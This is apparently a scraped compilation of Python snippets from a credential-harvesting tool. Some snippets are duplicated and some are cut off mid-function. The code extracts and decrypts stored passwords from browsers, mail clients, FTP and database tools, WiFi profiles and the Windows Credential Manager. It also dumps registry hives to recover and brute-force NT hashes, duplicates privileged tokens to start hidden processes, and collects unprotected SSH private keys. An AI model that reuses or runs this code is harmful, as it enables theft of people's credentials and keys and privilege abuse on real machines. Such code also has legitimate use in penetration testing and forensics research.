def hashes_to_dic(self, title, format, content):
        Header().title1(title)
        print_debug('INFO', 'Format: (%s)' % format)

        items = sorted(content)
        pwdFound = []
        values = {}

        all_hash = '\r\n'
        for item in items:
            hash = content[item]
            (uid, rid, lmhash, nthash) = hash.split(':')[:4]
            self.wordlist.append(uid.encode("utf8"))
            all_hash = '%s\r\n%s' % (all_hash, hash)
            password = self.bruteForce_Hash(nthash)

            # if a password has been found from the dictionary attack
            if password:
                accounts = {}
                accounts['Category'] = 'System account'
                accounts['user'] = uid
                accounts['password'] = password
                pwdFound.append(accounts)

        values['hashes'] = all_hash
        pwdFound.append(values)
        return pwdFound
Exemple #2
0
	def run(self):
		# print title
		Header().title_info('Dot Net Passport')
		
		a = self.get_creds()
		pwd = ''
		pwdFound = []
		if a:
			for i in a:
				values = {}
				if i['Type'] == win32cred.CRED_TYPE_DOMAIN_VISIBLE_PASSWORD:
					cipher_text = i['CredentialBlob']
					pwd = self.Win32CryptUnprotectData(cipher_text, self.get_entropy())
					if pwd != 'failed':
						values['TargetName'] = i['TargetName'] 
						if i['UserName'] is not None:
							values['Username'] = i['UserName']
						try:
							values['Password'] = pwd.decode('utf16')
						except Exception,e:
							print_debug('DEBUG', '{0}'.format(e))
							values['INFO'] = 'Error decoding the password'
						
						pwdFound.append(values)
					
			# print the results
			print_output('Dot Net Passport', pwdFound)
Exemple #3
0
	def get_creds(self):
		try:
			creds = win32cred.CredEnumerate(None, 0)
			return creds
		except Exception,e:
			print_debug('DEBUG', '{0}'.format(e))
			return None
def impersonate_token(hToken):
    if not windll.Shell32.IsUserAnAdmin():
        print_debug('ERROR', 'You need admin rights to run impersonate !')
    EnablePrivilege("SeDebugPrivilege")
    #hToken = getProcessToken(pid)
    hTokendupe = HANDLE( INVALID_HANDLE_VALUE )
    SecurityImpersonation = 2
    TokenPrimary = 1
    if not windll.advapi32.DuplicateTokenEx( hToken, TOKEN_ALL_ACCESS, None, SecurityImpersonation, TokenPrimary, byref( hTokendupe ) ):
        WinError()
    windll.kernel32.CloseHandle(hToken)
    
    try:
        EnablePrivilege("SeAssignPrimaryTokenPrivilege", hToken = hTokendupe)
    except Exception as e:
        pass
    try:
        EnablePrivilege("SeIncreaseQuotaPrivilege", hToken = hTokendupe)
    except Exception as e:
        pass
    try:
        EnablePrivilege("SeImpersonatePrivilege")
    except Exception as e:
        pass

    if not windll.advapi32.ImpersonateLoggedOnUser(hTokendupe):
        return

    return hTokendupe
def start_proc_with_token(args, hTokendupe, hidden=True):
    ##Start the process with the token.
    lpProcessInformation = PROCESS_INFORMATION()
    lpStartupInfo = STARTUPINFO()
    if hidden:
        lpStartupInfo.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP
        lpStartupInfo.wShowWindow = subprocess.SW_HIDE
    
    CREATE_NEW_CONSOLE = 0x00000010
    CREATE_UNICODE_ENVIRONMENT = 0x00000400
    NORMAL_PRIORITY_CLASS = 0x00000020
    
    dwCreationflag = NORMAL_PRIORITY_CLASS | CREATE_UNICODE_ENVIRONMENT | CREATE_NEW_CONSOLE

    userenv = WinDLL('userenv', use_last_error=True)
    userenv.CreateEnvironmentBlock.argtypes = (POINTER(c_void_p), c_void_p, c_int)
    userenv.DestroyEnvironmentBlock.argtypes = (c_void_p,)
    cenv = c_void_p()
    
    success = userenv.CreateEnvironmentBlock(byref(cenv), hTokendupe, 0)
    if not success:
        return
    
    success = windll.advapi32.CreateProcessAsUserA(hTokendupe, None, ' '.join(args), None, None, True, dwCreationflag, cenv, None, byref(lpStartupInfo), byref(lpProcessInformation))
    if not success:
       return
    
    print_debug('INFO', 'Process created PID: ' + str(lpProcessInformation.dwProcessId))
    return lpProcessInformation.dwProcessId
Exemple #6
0
	def run(self):
		# Need admin privileges
		if not windll.Shell32.IsUserAnAdmin():
			if logging.getLogger().isEnabledFor(logging.INFO) == True:
				Header().title('Windows Secrets')
			print_debug('WARNING', '[!] This script should be run as admin!')
			return
		
		# print the title
		Header().title('Windows Secrets')
		
		# if hives already exists
		if self.check_existing_systemFiles():
			self.delete_existing_systemFiles() # delete it
		
		# save system hives
		for f in self.sysFile:
			subprocess.Popen('reg.exe save hklm\%s %s.save' % (f,f) , shell=True, stdout=subprocess.PIPE).stdout.read()
		
		if not self.check_existing_systemFiles():
			print_debug('WARNING', 'Remove existing hive files and launch it again.')
			return
		
		retrieve_hash(self.address, '%s.save' % self.sysFile[2], '%s.save' % self.sysFile[1], '%s.save' % self.sysFile[0], self.ntds, self.history)
		
		# remove hives files
		self.delete_existing_systemFiles()
def ListSids():
    sids=[]

    for proc in psutil.process_iter():
        try:
            pinfo = proc.as_dict(attrs=['pid', 'username', 'name'])
        except psutil.NoSuchProcess:
            pass
        if pinfo['pid']<=4:
            continue
        if pinfo['username'] is None:
            continue
        try:
            hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, int(pinfo['pid']))
            hToken = HANDLE(INVALID_HANDLE_VALUE)
            windll.advapi32.OpenProcessToken(hProcess, tokenprivs, byref(hToken))

            try:
                sids.append((pinfo['pid'], pinfo['name'], GetTokenSid(hToken), pinfo['username']))
            except:
                pass
            windll.kernel32.CloseHandle(hToken)
            windll.kernel32.CloseHandle(hProcess)
        except Exception as e:
            print_debug('ERROR', str(e))
    return list(sids)
Exemple #8
0
	def get_history(self):
		urls = []
		urls = self.history_from_regedit()
		
		try:
			# wrapper to call the dll exported function (called list)
			lib = cdll.LoadLibrary(dll_name)
			lib.list.restype = POINTER(c_wchar_p)
			ret = lib.list()

			for r in ret:
				if r:
					if r.startswith("http") and r not in urls:
						urls.append(r)
				else:
					break
		
			# Unload the dll to delete it later
			handle = lib._handle # obtain the DLL handle
			windll.kernel32.FreeLibrary(handle)
			
			# delete the dll
			os.remove(dll_name)
			
		except:
			print_debug('ERROR', 'Browser history failed to load, only few url will be tried')
			pass
		
		urls.append('https://www.facebook.com/')
		urls.append('https://www.gmail.com/')
		urls.append('https://accounts.google.com/')
		urls.append('https://accounts.google.com/servicelogin')
		
		return urls
Exemple #9
0
    def accountrc_decrypt(self, filename, key, mode=DES.MODE_CFB):
        """ Reads passwords from ClawsMail's accountrc file """
        p = ConfigParser()
        p.read(filename)

        pwdFound = []
        for s in p.sections():
            values = {}
            try:
                try:
                    address = p.get(s, 'address')
                    account = p.get(s, 'account_name')
                except:
                    address = '<unknown>'
                    account = '<unknown>'

                password = self.pass_decrypt(p.get(s, 'password'), key, mode=mode)
                # print('password for %s, %s is "%s"' % (account, address, password))
                values = {'Account' : account, 'Address': address, 'Password': password}
            except Exception as e:
                print_debug('ERROR', 'Error resolving password for account "%s": %s' % (s, e))

             # write credentials into a text file
            if len(values) != 0:
                pwdFound.append(values)

        return pwdFound
Exemple #10
0
	def extractSecretKey(self, globalSalt, masterPassword, entrySalt):

		(globalSalt, masterPassword, entrySalt) = self.is_masterpassword_correct(masterPassword)
		
		if unhexlify('f8000000000000000000000000000001') not in self.key3:
			return None
		privKeyEntry = self.key3[ unhexlify('f8000000000000000000000000000001') ]
		saltLen = ord( privKeyEntry[1] )
		nameLen = ord( privKeyEntry[2] )
		privKeyEntryASN1 = decoder.decode( privKeyEntry[3+saltLen+nameLen:] )
		data = privKeyEntry[3+saltLen+nameLen:]
		self.printASN1(data, len(data), 0)
		
		#see https://github.com/philsmd/pswRecovery4Moz/blob/master/pswRecovery4Moz.txt
		entrySalt = privKeyEntryASN1[0][0][1][0].asOctets()
		privKeyData = privKeyEntryASN1[0][1].asOctets()
		privKey = self.decrypt3DES( globalSalt, masterPassword, entrySalt, privKeyData )
		self.printASN1(privKey, len(privKey), 0)

		privKeyASN1 = decoder.decode( privKey )
		prKey= privKeyASN1[0][2].asOctets()
		self.printASN1(prKey, len(prKey), 0)
		prKeyASN1 = decoder.decode( prKey )
		id = prKeyASN1[0][1]
		key = long_to_bytes( prKeyASN1[0][3] )

		print_debug('DEBUG', 'key: %s' % repr(key))
		return key
Exemple #11
0
	def hashes_to_dic(self, title, format, content):
		Header().title1(title)
		print_debug('INFO', 'Format: (%s)' % format)
		
		items = sorted(content)
		pwdFound = []
		values = {}
		
		all_hash = '\r\n'
		for item in items:
			hash = content[item]
			(uid, rid, lmhash, nthash) = hash.split(':')[:4]
			self.wordlist.append(uid.encode("utf8"))
			all_hash = '%s\r\n%s' % (all_hash, hash)
			password = self.bruteForce_Hash(nthash)
			
			# if a password has been found from the dictionary attack
			if password:
				accounts = {}
				accounts['Category'] = 'System account'
				accounts['user'] = uid
				accounts['password'] = password
				pwdFound.append(accounts)
			
		values['hashes'] = all_hash
		pwdFound.append(values)
		return pwdFound
Exemple #12
0
	def run(self):
		# print title
		Header().title_debug('SQL Developer')
		
		mainPath = self.get_mainPath()
		if mainPath == 'Error':
			print_debug('ERROR', 'The APPDATA environment variable is not defined.')
		
		elif mainPath == 'SQL_NOT_EXISTS':
			print_debug('INFO','SQL Developer not installed.')
		
		elif mainPath == 'SQL_NO_PASSWD':
			print_debug('INFO', 'No passwords found.')
			
		else:
			passphrase = self.get_passphrase(mainPath)
			if passphrase == 'Not_Found':
				print_debug('WARNING', 'The passphrase used to encrypt has not been found.')
			
			elif passphrase == 'xml_Not_Found':
				print_debug('WARNING', 'The xml file containing the passphrase has not been found.')
				
			else:
				salt = self.get_salt()
				self.get_infos(mainPath, passphrase, salt)
Exemple #13
0
	def decipher_new_version(self, path):
		database_path = path + os.sep + 'Login Data'
		if os.path.exists(database_path):
			
			# Connect to the Database
			conn = sqlite3.connect(database_path)
			cursor = conn.cursor()
			
			# Get the results
			try:
				cursor.execute('SELECT action_url, username_value, password_value FROM logins')
			except Exception,e:
				print_debug('DEBUG', '{0}'.format(e))
				print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !')
				return 
			
			pwdFound = []
			for result in cursor.fetchall():
				values = {}
				
				# Decrypt the Password
				password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
				if password:
					values['Site'] = result[0]
					values['Username'] = result[1]
					values['Password'] = password
					pwdFound.append(values)
			
			# print the results
			print_output("Opera", pwdFound)
Exemple #14
0
	def retrieve_password(self):
		# print the title
		Header().title_debug('Wifi (from Network Manager)')
		
		directory = '/etc/NetworkManager/system-connections'
		if os.path.exists(directory):
			if os.getuid() != 0:
				print_debug('INFO', 'You need more privileges (run it with sudo)\n')
			
			wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]
			
			pwdFound = []
			for w in wireless_ssid:
				cp = RawConfigParser()
				cp.read(os.path.join(directory, w))
				values = {}
				
				values['SSID'] = w
				if cp.sections():
					for section in cp.sections():
						if 'wireless' in section:
							for i in cp.items(section):
								values[i[0]] = i[1]
				
				# write credentials into a text file
				if len(values) != 0:
					pwdFound.append(values)
			
			# print the results
			print_output('Wifi', pwdFound)
		else:
			print_debug('ERROR', 'the path "%s" does not exist' %(directory))
Exemple #15
0
    def accountrc_decrypt(self, filename, key, mode=DES.MODE_CFB):
        """ Reads passwords from ClawsMail's accountrc file """
        p = ConfigParser()
        p.read(filename)

        pwdFound = []
        for s in p.sections():
            values = {}
            try:
                try:
                    address = p.get(s, 'address')
                    account = p.get(s, 'account_name')
                except:
                    address = '<unknown>'
                    account = '<unknown>'

                password = self.pass_decrypt(p.get(s, 'password'), key, mode=mode)
                # print('password for %s, %s is "%s"' % (account, address, password))
                values = {'Account' : account, 'Address': address, 'Password': password}
            except Exception as e:
                print_debug('ERROR', 'Error resolving password for account "%s": %s' % (s, e))

             # write credentials into a text file
            if len(values) != 0:
                pwdFound.append(values)

        return pwdFound
Exemple #16
0
    def run(self):
        # print title
        Header().title_debug('SQL Developer')

        mainPath = self.get_mainPath()
        if mainPath == 'Error':
            print_debug('ERROR',
                        'The APPDATA environment variable is not defined.')

        elif mainPath == 'SQL_NOT_EXISTS':
            print_debug('INFO', 'SQL Developer not installed.')

        elif mainPath == 'SQL_NO_PASSWD':
            print_debug('INFO', 'No passwords found.')

        else:
            passphrase = self.get_passphrase(mainPath)
            if passphrase == 'Not_Found':
                print_debug(
                    'WARNING',
                    'The passphrase used to encrypt has not been found.')

            elif passphrase == 'xml_Not_Found':
                print_debug(
                    'WARNING',
                    'The xml file containing the passphrase has not been found.'
                )

            else:
                salt = self.get_salt()
                self.get_infos(mainPath, passphrase, salt)
Exemple #17
0
    def get_history(self):
        urls = []
        urls = self.history_from_regedit()

        try:
            # wrapper to call the dll exported function (called list)
            lib = cdll.LoadLibrary(dll_name)
            lib.list.restype = POINTER(c_wchar_p)
            ret = lib.list()

            for r in ret:
                try:
                    if r:
                        if r.startswith("http") and r not in urls:
                            urls.append(r)
                    else:
                        break
                except Exception, e:
                    print_debug('DEBUG', '{0}'.format(e))

            # Unload the dll to delete it later
            handle = lib._handle  # obtain the DLL handle
            windll.kernel32.FreeLibrary(handle)

            # delete the dll
            os.remove(dll_name)
Exemple #18
0
    def extractSecretKey(self, globalSalt, masterPassword, entrySalt):

        (globalSalt, masterPassword,
         entrySalt) = self.is_masterpassword_correct(masterPassword)

        if unhexlify('f8000000000000000000000000000001') not in self.key3:
            return None
        privKeyEntry = self.key3[unhexlify('f8000000000000000000000000000001')]
        saltLen = ord(privKeyEntry[1])
        nameLen = ord(privKeyEntry[2])
        privKeyEntryASN1 = decoder.decode(privKeyEntry[3 + saltLen + nameLen:])
        data = privKeyEntry[3 + saltLen + nameLen:]
        self.printASN1(data, len(data), 0)

        #see https://github.com/philsmd/pswRecovery4Moz/blob/master/pswRecovery4Moz.txt
        entrySalt = privKeyEntryASN1[0][0][1][0].asOctets()
        privKeyData = privKeyEntryASN1[0][1].asOctets()
        privKey = self.decrypt3DES(globalSalt, masterPassword, entrySalt,
                                   privKeyData)
        self.printASN1(privKey, len(privKey), 0)

        privKeyASN1 = decoder.decode(privKey)
        prKey = privKeyASN1[0][2].asOctets()
        self.printASN1(prKey, len(prKey), 0)
        prKeyASN1 = decoder.decode(prKey)
        id = prKeyASN1[0][1]
        key = long_to_bytes(prKeyASN1[0][3])

        print_debug('DEBUG', 'key: %s' % repr(key))
        return key
Exemple #19
0
	def get_key_info(self):
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		try:
			key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
		except Exception,e:
			print_debug('DEBUG', '{0}'.format(e))
			return False
Exemple #20
0
	def get_logins_info(self):
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		try:
			key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead)
		except Exception,e:
			print_debug('DEBUG', '{0}'.format(e))
			return False
Exemple #21
0
	def get_history(self):
		urls = []
		urls = self.history_from_regedit()
		
		try:
			# wrapper to call the dll exported function (called list)
			lib = cdll.LoadLibrary(dll_name)
			lib.list.restype = POINTER(c_wchar_p)
			ret = lib.list()

			for r in ret:
				try:
					if r:
						if r.startswith("http") and r not in urls:
							urls.append(r)
					else:
						break
				except Exception,e:
					print_debug('DEBUG', '{0}'.format(e))
		
			# Unload the dll to delete it later
			handle = lib._handle # obtain the DLL handle
			windll.kernel32.FreeLibrary(handle)
			
			# delete the dll
			os.remove(dll_name)
Exemple #22
0
	def retrieve_password(self):
		# print the title
		Header().title_debug('Wifi (from Network Manager)')
		
		directory = '/etc/NetworkManager/system-connections'
		if os.path.exists(directory):
			if os.getuid() != 0:
				print_debug('INFO', 'You need more privileges (run it with sudo)\n')
			
			wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]
			
			pwdFound = []
			for w in wireless_ssid:
				cp = RawConfigParser()
				cp.read(os.path.join(directory, w))
				values = {}
				
				values['SSID'] = w
				if cp.sections():
					for section in cp.sections():
						if 'wireless' in section:
							for i in cp.items(section):
								values[i[0]] = i[1]
				
				# write credentials into a text file
				if len(values) != 0:
					pwdFound.append(values)
			
			# print the results
			print_output('Wifi', pwdFound)
		else:
			print_debug('WARNING', 'the path "%s" does not exist' %(directory))
Exemple #23
0
	def get_key_info(self):
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		try:
			key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
		except Exception,e:
			print_debug('DEBUG', '{0}'.format(e))
			return False
Exemple #24
0
	def run(self):
		# print title
		Header().title_info('Kalypso Media Launcher')
		creds = []
		key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'
		
		if 'APPDATA' in os.environ:
			inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini'
		else:
			print_debug('ERROR', 'The APPDATA environment variable is not defined.')
			return
		
		# The actual user details are stored in *.userdata files
		if not os.path.exists(inifile):
			print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.')
			return
		
		config = ConfigParser.ConfigParser()
		config.read(inifile)
		values = {}
		
		values['Login'] = config.get('styx user','login')
		
		# get the encoded password
		cookedpw = base64.b64decode(config.get('styx user','password'));
		values['Password'] = self.xorstring(cookedpw, key)
		
		creds.append(values)
		
		print_output("Kalypso Media Launcher", creds)
Exemple #25
0
class Chrome(ModuleInfo):
    def __init__(self):
        options = {
            'command': '-c',
            'action': 'store_true',
            'dest': 'chrome',
            'help': 'chrome'
        }
        ModuleInfo.__init__(self, 'chrome', 'browsers', options)

    # main function
    def run(self):
        # print title
        Header().title_info('Chrome')

        database_path = ''
        if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ:
            # For Win7
            path_Win7 = os.environ.get('HOMEDRIVE') + os.environ.get(
                'HOMEPATH'
            ) + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data'

            # For XP
            path_XP = os.environ.get('HOMEDRIVE') + os.environ.get(
                'HOMEPATH'
            ) + '\AppData\Local\Google\Chrome\User Data\Default\Login Data'

            if os.path.exists(path_XP):
                database_path = path_XP

            elif os.path.exists(path_Win7):
                database_path = path_Win7

            else:
                print_debug('INFO', 'Google Chrome not installed.')
                return
        else:
            print_debug(
                'ERROR',
                'Environment variables (HOMEDRIVE or HOMEPATH) have not been found'
            )
            return

        # Copy database before to query it (bypass lock errors)
        try:
            shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db')
            database_path = os.getcwd() + os.sep + 'tmp_db'

        except Exception, e:
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('ERROR', 'An error occured copying the database file')

        # Connect to the Database
        try:
            conn = sqlite3.connect(database_path)
            cursor = conn.cursor()
        except Exception, e:
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('ERROR', 'An error occured opening the database file')
            return
Exemple #26
0
	def retrieve_password(self):
		# print title
		Header().title_debug('Outlook')
		
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
		
		try:
			hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
		except:
			print_debug('WARNING', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath)
			return

		num = win32api.RegQueryInfoKey(hkey)[0]
		pwdFound = []
		for x in range(0, num):
			name = win32api.RegEnumKey(hkey, x)
			skey = win32api.RegOpenKey(hkey, name, 0, accessRead)
			
			num_skey = win32api.RegQueryInfoKey(skey)[0]
			if num_skey != 0:
				for y in range(0, num_skey):
					name_skey = win32api.RegEnumKey(skey, y)
					sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
					num_sskey = win32api.RegQueryInfoKey(sskey)[1]
					for z in range(0, num_sskey):
						k = win32api.RegEnumValue(sskey, z)
						if 'password' in k[0].lower():
							values = self.retrieve_info(sskey, name_skey)
							# write credentials into a text file
							if len(values) != 0:
								pwdFound.append(values)
			
		# print the results
		print_output("Outlook", pwdFound)
Exemple #27
0
	def run(self):
		# print title
		Header().title_info('Kalypso Media Launcher')
		creds = []
		key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'
		
		if 'APPDATA' in os.environ:
			inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini'
		else:
			print_debug('ERROR', 'The APPDATA environment variable is not defined.')
			return
		
		# The actual user details are stored in *.userdata files
		if not os.path.exists(inifile):
			print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.')
			return
		
		config = ConfigParser.ConfigParser()
		config.read(inifile)
		values = {}
		
		values['Login'] = config.get('styx user','login')
		
		# get the encoded password
		cookedpw = base64.b64decode(config.get('styx user','password'));
		values['Password'] = self.xorstring(cookedpw, key)
		
		creds.append(values)
		
		print_output("Kalypso Media Launcher", creds)

					
				
Exemple #28
0
	def get_creds(self):
		try:
			creds = win32cred.CredEnumerate(None, 0)
			return creds
		except Exception,e:
			print_debug('DEBUG', '{0}'.format(e))
			return None
Exemple #29
0
    def extract_repositories_credentials(self):
        """
        Extract all repositories's credentials.

        See https://maven.apache.org/settings.html#Servers

        :return: List of dict in which one dict contains all information for a repository.
        """
        repos_creds = []
        maven_settings_file_location = os.environ.get("USERPROFILE") + "\\.m2\\settings.xml"
        if os.path.isfile(maven_settings_file_location):
            try:
                settings = ET.parse(maven_settings_file_location).getroot()
                server_nodes = settings.findall(".//%sserver" % self.settings_namespace)
                for server_node in server_nodes:
                    creds = {}
                    for child_node in server_node:
                        tag_name = child_node.tag.replace(self.settings_namespace, "")
                        if tag_name in self.nodes_to_extract:
                            creds[tag_name] = child_node.text.strip()
                    if len(creds) > 0:
                        repos_creds.append(creds)
            except Exception as e:
                print_debug("ERROR", "Cannot retrieve repositories credentials '%s'" % e)
                pass

        return repos_creds
Exemple #30
0
    def extract_private_keys_unprotected(self):
        """
        Extract all DSA/RSA private keys that are not protected with a passphrase.

        :return: List of encoded key (key file content)
        """
        keys = []
        if isdir(self.key_files_location):
            for (dirpath, dirnames, filenames) in walk(self.key_files_location, followlinks=True):
                for f in filenames:
                    key_file_path = join(dirpath, f)
                    if isfile(key_file_path):
                        try:
                            # Read encoded content of the key
                            with open(key_file_path, "r") as key_file:
                                key_content_encoded = key_file.read()
                            # Determine the type of the key (public/private) and what is it algorithm
                            if "DSA PRIVATE KEY" in key_content_encoded:
                                key_algorithm = "DSA"
                            elif "RSA PRIVATE KEY" in key_content_encoded:
                                key_algorithm = "RSA"
                            else:
                                key_algorithm = None
                            # Check if the key can be loaded (used) without passphrase
                            if key_algorithm is not None and self.is_private_key_unprotected(key_content_encoded,
                                                                                               key_algorithm):
                                keys.append(key_content_encoded)
                        except Exception as e:
                            print_debug("ERROR", "Cannot load key file '%s' '%s'" % (key_file_path, e))
                            pass

        return keys
Exemple #31
0
    def is_private_key_unprotected(self, key_content_encoded, key_algorithm):
        """
        Check if the private key can be loaded without specifying any passphrase.

        PyCrypto >= 2.6.1 required in order to have the method importKey() in DSA class.

        :param key_content_encoded: Encoded content of the private key to test
        :param key_algorithm: Algorithm of the key (RSA or DSA)
        :return: True only if the key can be successfuly loaded and is usable
        """
        state = False
        try:
            # Try to load it
            if key_algorithm == "RSA":
                key = RSA.importKey(key_content_encoded)
            else:
                key = DSA.importKey(key_content_encoded)
            # Validate loading
            state = (key is not None and key.can_sign() and key.has_private())
        except Exception as e:
            print_debug("ERROR", "Cannot validate key protection '%s'" % e)
            state = False
            pass

        return state
Exemple #32
0
	def run(self, historic=''):
		# print title
		Header().title_debug('Internet Explorer')
		
		# write the binary file
		try:
			self.write_binary_file()
		except:
			print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name)
		
		list = []
		if historic:
			if os.path.exists(historic):
				f = open(historic, 'r')
				for line in f:
					list.append(line.strip())
			else:
				print_debug('WARNING', 'The text file %s does not exist' % historic)
		
		# retrieve the urls from the history
		hash_tables = self.get_hash_table(list)
		
		# open the registry
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		keyPath = 'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2'
		
		failed = False
		try:
			hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
		except:
			failed = True
		
		nb_site = 0
		nb_pass_found = 0 
		if failed == False:
			num = win32api.RegQueryInfoKey(hkey)[1]
			for x in range(0, num):
				k = win32api.RegEnumValue(hkey, x)
				if k:
					nb_site +=1
					for h in hash_tables:
						# both hash are similar, we can decipher the password
						if h[1] == k[0][:40].lower():
							nb_pass_found += 1
							cipher_text = k[1]
							self.decipher_password(cipher_text, h[0])
							break
			
			# print the results
			print_output("Internet Explorer", pwdFound)
			
			# manage errors
			if nb_site == 0:
				print_debug('INFO', 'No credentials stored in the IE browser.')
			elif nb_site > nb_pass_found:
				print_debug('ERROR', '%s hashes have not been decrypted, the associate website used to decrypt the passwords has not been found' % str(nb_site - nb_pass_found))
			
		else:
			print_debug('INFO', 'No password stored.\nThe registry key storing the ie password has not been found.\nKey: %s' % keyPath)
Exemple #33
0
	def check_winscp_installed(self):
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		try:
			key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead)
			return True
		except Exception,e:
			print_debug('DEBUG', '{0}'.format(e))
			return False
Exemple #34
0
 def initialize_libnss(self, list_libnss, profile):
     for lib in list_libnss:
         try:
             self.libnss = CDLL(lib)
             if self.libnss.NSS_Init(profile) == 0:
                 return True
         except Exception, e:
             print_debug('DEBUG', '{0}'.format(e))
Exemple #35
0
	def initialize_libnss(self, list_libnss, profile):
		for lib in list_libnss:
			try:
				self.libnss = CDLL(lib)
				if self.libnss.NSS_Init(profile) == 0:
					return True
			except Exception,e:
				print_debug('DEBUG', '{0}'.format(e))
Exemple #36
0
	def get_infos(self, path, passphrase, salt):
		for p in os.listdir(path):
			if p.startswith('o.jdeveloper.db.connection'):
				path += os.sep + p
				break
		
		xml_file = path + os.sep + 'connections.xml'
		
		if os.path.exists(xml_file):
			tree = ET.ElementTree(file=xml_file)
			pwdFound = []
			values = {}
			for elem in tree.iter():
				if 'addrType' in elem.attrib.keys():
					if elem.attrib['addrType'] == 'sid':
						for e in elem.getchildren():
							values['sid'] = e.text
					
					elif elem.attrib['addrType'] == 'port':
						for e in elem.getchildren():
							values['port'] = e.text
							
					elif elem.attrib['addrType'] == 'user':
						for e in elem.getchildren():
							values['user'] = e.text
					
					elif elem.attrib['addrType'] == 'ConnName':
						for e in elem.getchildren():
							values['Connection Name'] = e.text
					
					elif elem.attrib['addrType'] == 'customUrl':
						for e in elem.getchildren():
							values['custom Url'] = e.text
							
					elif elem.attrib['addrType'] == 'SavePassword':
						for e in elem.getchildren():
							values['SavePassword'] = e.text
				
					elif elem.attrib['addrType'] == 'hostname':
						for e in elem.getchildren():
							values['hostname'] = e.text
							
					elif elem.attrib['addrType'] == 'password':
						for e in elem.getchildren():
							pwd = self.decrypt(salt, e.text, passphrase)
							values['password'] = pwd
							
					elif elem.attrib['addrType'] == 'driver':
						for e in elem.getchildren():
							values['driver'] = e.text
							
							# password found 
							pwdFound.append(values)
							
			# print the results
			print_output("SQL Developer", pwdFound)
		else:
			print_debug('ERROR', 'The xml file connections.xml containing the passwords has not been found.')
Exemple #37
0
	def get_infos(self, path, passphrase, salt):
		for p in os.listdir(path):
			if p.startswith('o.jdeveloper.db.connection'):
				path += os.sep + p
				break
		
		xml_file = path + os.sep + 'connections.xml'
		
		if os.path.exists(xml_file):
			tree = ET.ElementTree(file=xml_file)
			pwdFound = []
			values = {}
			for elem in tree.iter():
				if 'addrType' in elem.attrib.keys():
					if elem.attrib['addrType'] == 'sid':
						for e in elem.getchildren():
							values['sid'] = e.text
					
					elif elem.attrib['addrType'] == 'port':
						for e in elem.getchildren():
							values['port'] = e.text
							
					elif elem.attrib['addrType'] == 'user':
						for e in elem.getchildren():
							values['user'] = e.text
					
					elif elem.attrib['addrType'] == 'ConnName':
						for e in elem.getchildren():
							values['Connection Name'] = e.text
					
					elif elem.attrib['addrType'] == 'customUrl':
						for e in elem.getchildren():
							values['custom Url'] = e.text
							
					elif elem.attrib['addrType'] == 'SavePassword':
						for e in elem.getchildren():
							values['SavePassword'] = e.text
				
					elif elem.attrib['addrType'] == 'hostname':
						for e in elem.getchildren():
							values['hostname'] = e.text
							
					elif elem.attrib['addrType'] == 'password':
						for e in elem.getchildren():
							pwd = self.decrypt(salt, e.text, passphrase)
							values['password'] = pwd
							
					elif elem.attrib['addrType'] == 'driver':
						for e in elem.getchildren():
							values['driver'] = e.text
							
							# password found 
							pwdFound.append(values)
							
			# print the results
			print_output("SQL Developer", pwdFound)
		else:
			print_debug('ERROR', 'The xml file connections.xml containing the passwords has not been found.')
Exemple #38
0
	def parse_file(self):
		pwdFound = []
		
		fd = None
		try:
			fd = open(self.filestr)
		except Exception, e: 
			print_debug('DEBUG', '{0}'.format(e))
			print_debug('INFO', 'Could not open the file: %s ' % self.filestr)
Exemple #39
0
	def retrieve_password(self):
		# print title
		Header().title_debug('FTP Navigator')
	
		path = "C:\\FTP Navigator\\Ftplist.txt"
		if os.path.exists(path):
			self.read_file(path)
		else:
			print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path)
Exemple #40
0
    def parse_file(self):
        pwdFound = []

        fd = None
        try:
